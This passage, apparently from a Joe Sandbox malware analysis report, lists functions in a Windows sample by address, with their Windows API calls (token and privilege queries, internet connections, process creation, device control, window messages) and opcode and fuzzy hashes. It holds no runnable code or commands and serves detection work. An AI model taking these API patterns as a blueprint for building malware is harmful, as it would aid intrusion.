                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                    • Instruction ID: 5e9efb24b8272fe94738c64dd1c0947a65318d33796acfb796978e9fe7651024
                    • Opcode Fuzzy Hash: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                    • Instruction Fuzzy Hash: B7112432A04208EACF05B3B89C4B9FE7B6D9F45360F14815AF20857192DF6D2D9687E5
                    Function 007A8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                      • Part of subcall function 007A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                      • Part of subcall function 007A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                      • Part of subcall function 007A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                      • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A8BEB
                    • _memcmp.LIBCMT ref: 007A8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A8C44
                    • HeapFree.KERNEL32(00000000), ref: 007A8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                    • Instruction ID: ff57969cfdde1334147c28c7e7c1c024bf31b285eebd5801d27a1bad98d5a1f6
                    • Opcode Fuzzy Hash: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                    • Instruction Fuzzy Hash: 26219F71D02208EFDB04DF94C944BEEB7B8EF81351F048199E455A7241DB39AE05CF61
                    Function 007C1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A97
                      • Part of subcall function 007C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                      • Part of subcall function 007C1B21: InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                    • Instruction ID: a4c872dfc5be27c899c343778edb948085190a3a30d8e6bc605cbbd5fff12530
                    • Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                    • Instruction Fuzzy Hash: 5321D171201600BFDB129F608C04FBBB7BDFF45710F54402EFA0696652EB39E8219BA4
                    Function 007AE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF5BC
                      • Part of subcall function 007AF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 007AF5E2
                      • Part of subcall function 007AF5AD: lstrcmpiW.KERNEL32(00000000,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 007AE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 59c95763c754afb5943372c728cb39e9d215718dbce7dcf4e6b2ed0638010689
                    • Instruction ID: 705ce3db3c5302019a291d345b97f976e94d59160f5e6f70b66827445f923e93
                    • Opcode Fuzzy Hash: 59c95763c754afb5943372c728cb39e9d215718dbce7dcf4e6b2ed0638010689
                    • Instruction Fuzzy Hash: 1F119636200345EFCB25AF64DC49E7A77B8FF86350B40812AF816C7290EB799951D7A4
                    Function 00785332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00785351
                      • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                    • Instruction ID: 92ce8ca03c12e428b69644e367a60fa52d18e66ea345c30f2cf548f5755ae29d
                    • Opcode Fuzzy Hash: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                    • Instruction Fuzzy Hash: D7112332684E05EFCF313F70EC0C65E3B98AF143E8B20852AF9099A491DFBD89409790
                    Function 00754531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00754560
                      • Part of subcall function 0075410D: _memset.LIBCMT ref: 0075418D
                      • Part of subcall function 0075410D: _wcscpy.LIBCMT ref: 007541E1
                      • Part of subcall function 0075410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 007545B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007545C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                    • Instruction ID: f4e9c36a649ed4d68c4c08f6c57ac831eda8478508fd8797f4118622032a95f2
                    • Opcode Fuzzy Hash: ffeb508cf1b732501988f086e6f10bab6023652950fcd882079ec10eeed5d37e
                    • Instruction Fuzzy Hash: DF210A705447889FEB329B24DC49BE7BBECAF01319F00409EE69E56181D7B81E88CB51
                    Function 007B40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007B40D1
                    • _memset.LIBCMT ref: 007B40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007B4144
                    • CloseHandle.KERNEL32(00000000), ref: 007B414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                    • Instruction ID: f49cfec486091bdee627f7488fe0fbecc47c479e1ed4cf5473dd6b322a738334
                    • Opcode Fuzzy Hash: fb14be002550a8f8a5d56ce72a00ba572f90e1f784fb9801547e590268e4918a
                    • Instruction Fuzzy Hash: C811987590122C7AD7305AA59C4DFEBBB7CEB44760F104196F908D7180D6744E808BA4
                    Function 007C667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 007C66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C66B7
                    • _memmove.LIBCMT ref: 007C66E4
                    • inet_ntoa.WSOCK32(?), ref: 007C66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                    • Instruction ID: a2221a05c97807613c7602ea4d253e070ded1c8d95aa56669f2864bbcbb6e211
                    • Opcode Fuzzy Hash: 7290387a05b7e3a77a836f0a3ec408b2b5805fb116f532d4e1cfed35d18539da
                    • Instruction Fuzzy Hash: D9119375900508EFCB00EBA4DD9ADEE77B8BF04311B048129F906A7161DF78AF04DBA1
                    Function 007A9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007A9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                    • Instruction ID: b255b29c42a3f2ff5696638f70787a636332a005dea8ce401b7c47a76626ff85
                    • Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                    • Instruction Fuzzy Hash: 75115E79901219FFDB10DFA5CC84EAEFB74FB48350F204195EA04B7290D671AE10DB94
                    Function 00751290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                    • GetClientRect.USER32(?,?), ref: 0078B84B
                    • GetCursorPos.USER32(?), ref: 0078B855
                    • ScreenToClient.USER32(?,?), ref: 0078B860
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                    • Instruction ID: b9e25618fcf86c4740fd974aff9d66b6eafff81fe07251abb4a33595b1a631f6
                    • Opcode Fuzzy Hash: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
                    • Instruction Fuzzy Hash: 49112B35601019FFCB00DF94D889AFE77B8FB05302F404456F942E7151D778AA55CBA5
                    Function 007B1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                    • Instruction ID: 7dc9bea4128cc5b0ab61599990301dab7ec2c55e6a91e0d6c7104fadf6cb48cb
                    • Opcode Fuzzy Hash: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
                    • Instruction Fuzzy Hash: 94115A31C0152CEBCF009FA5D858BEEBB78FF09751F848056E941B2240CF3955608B96
                    Function 00787207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 9aa422e2f0607389776573d5b88dead8f402113a87a0a07659d03b4a254e7c37
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: DE01433608414AFBCF5A6E84CC458EE3F72BF59351B648515FA1998031D33BC9B1EB81
                    Function 007DB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 007DB59E
                    • ScreenToClient.USER32(?,?), ref: 007DB5B6
                    • ScreenToClient.USER32(?,?), ref: 007DB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                    • Instruction ID: d310bb6b642409b2e54993d1b142aff6d1dc8537dfa5d1333ff0cf95f9bf342e
                    • Opcode Fuzzy Hash: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
                    • Instruction Fuzzy Hash: 511166B5D00209EFDB01CF99D4449EEFBB5FB08310F108166E955E3620D735AA618F50
                    Function 007DB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007DB8FE
                    • _memset.LIBCMT ref: 007DB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00817F20,00817F64), ref: 007DB93C
                    • CloseHandle.KERNEL32 ref: 007DB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                    • Instruction ID: f362c59e6495b2b1db75f86217fa207c27d28053941eb8d2465ca231bebb9a71
                    • Opcode Fuzzy Hash: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
                    • Instruction Fuzzy Hash: 85F05EB2544300BBE6102765AC09FFB3AADFF08794F008025FB09D5292DB79990187A9
                    Function 007B6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 007B6E88
                      • Part of subcall function 007B794E: _memset.LIBCMT ref: 007B7983
                    • _memmove.LIBCMT ref: 007B6EAB
                    • _memset.LIBCMT ref: 007B6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 007B6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                    • Instruction ID: 72fe1ae14348ee338f6c09307bf4c1809ff6c012ffa408556d3f52346de034a9
                    • Opcode Fuzzy Hash: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                    • Instruction Fuzzy Hash: A7F05E3A200200EBCF016F55DC89F8ABB2AFF45360B04C061FE095E22AC739A911DBB5
                    Function 007DC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                      • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC030
                    • LineTo.GDI32(00000000,?,?), ref: 007DC03D
                    • EndPath.GDI32(00000000), ref: 007DC04D
                    • StrokePath.GDI32(00000000), ref: 007DC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                    • Instruction ID: 7c8a3a972f8f3255e633783811d3b50b3485c065f8b9d6840bc04c4788fdca93
                    • Opcode Fuzzy Hash: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                    • Instruction Fuzzy Hash: 96F05E3114225AFBDB136F54AC0AFCE3F69BF05311F18C012FA12621E2C7B95665CB99
                    Function 007AA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                    • AttachThreadInput.USER32(00000000), ref: 007AA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
